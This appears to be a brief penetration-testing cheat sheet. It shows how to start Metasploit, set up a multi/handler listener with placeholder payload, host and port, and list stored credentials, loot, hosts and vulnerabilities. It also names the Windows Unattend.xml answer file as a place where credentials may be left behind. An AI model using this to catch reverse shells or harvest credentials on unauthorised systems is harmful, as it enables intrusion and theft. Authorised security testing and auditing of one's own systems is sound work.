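Pointing find_credentials at the contents of C:\Windows\Panther\Unattend.xml (or the Sysprep copy) on your own images tells you whether an answer file with live credentials was left behind.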


Set a Listener


Use this module to create a listener on your system:
use multi/handler

Set your payload:
set payload your-payload

Set your ip:
set LHOST your-ip

Set your port:
set LPORT 1234

Execute the listener on your system:
run


Start Metasploit


service postgresql start && msfconsole


Useful commands


Analyze workspace:
analyze

Enumerate credentials:
creds

Enumerate loots:
loot

Enumerate hosts:
hosts

Enumerate services:
services

Enumerate vulnerabilities:
vulns

